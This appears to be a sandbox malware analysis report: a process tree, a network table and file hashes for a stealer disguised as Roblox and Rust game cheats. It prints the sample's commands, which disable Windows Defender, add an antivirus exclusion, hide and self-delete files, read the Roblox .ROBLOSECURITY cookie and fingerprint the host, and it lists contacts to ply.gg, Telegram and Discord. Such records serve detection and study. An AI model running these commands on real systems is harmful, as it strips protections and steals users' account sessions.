"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe.exe
"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"
C:\hostNet\RuntimeBroker.exe
"C:\hostNet\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| NL | 23.62.61.139:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.139:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.135.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | answer-riverside.gl.at.ply.gg | udp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 73.143.109.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | answer-riverside.gl.at.ply.gg | udp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | answer-riverside.gl.at.ply.gg | udp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | answer-riverside.gl.at.ply.gg | udp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.133.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | tcp |
Files
memory/4792-0-0x00007FF863053000-0x00007FF863055000-memory.dmp
memory/4792-1-0x0000000000B30000-0x0000000000D16000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Loader.exe
| MD5 | 8f77f8b13b914f358059e3f7b9ddab70 |
| SHA1 | d406a28486b4dd881c454e526e149b98c0ec8462 |
| SHA256 | c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6 |
| SHA512 | b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad |
memory/4792-18-0x00007FF863050000-0x00007FF863B11000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sol.exe
| MD5 | 25daefc71be60b76cb49fc81424d768d |
| SHA1 | 48be475dd36b433d62d4f7fed9b4d81a90122dee |
| SHA256 | 1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a |
| SHA512 | e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe |
memory/4796-21-0x00000000004E0000-0x000000000050A000-memory.dmp
memory/4796-23-0x00007FF863050000-0x00007FF863B11000-memory.dmp
C:\hostNet\rlqSVEj.vbe
| MD5 | 92408a105526970fa12ef23225de61ae |
| SHA1 | bf70e8e671c10bf85771b2b8dd4549766cf79582 |
| SHA256 | b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10 |
| SHA512 | 56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara_Updater.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
C:\Users\Admin\AppData\Local\Temp\XClient.exe
| MD5 | 28ff989c1d462f567aabb9c5ba76456b |
| SHA1 | 24be926b14f64f6a9f5b8248d1618bae9a7fc0b2 |
| SHA256 | a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d |
| SHA512 | 2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba |
memory/1336-62-0x0000000000730000-0x0000000000746000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
| MD5 | ff8f5c2670894f74456e534b34d6a8fe |
| SHA1 | e0b35ae06f68adf07e4616da8e91bb1f935e492a |
| SHA256 | d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37 |
| SHA512 | a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff |
memory/2704-67-0x00000212BA830000-0x00000212BA870000-memory.dmp
memory/4796-68-0x00007FF863050000-0x00007FF863B11000-memory.dmp
memory/3136-74-0x000002393FBC0000-0x000002393FBE2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ukdf3zdd.d5a.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log
| MD5 | bb6a89a9355baba2918bb7c32eca1c94 |
| SHA1 | 976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2 |
| SHA256 | 192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b |
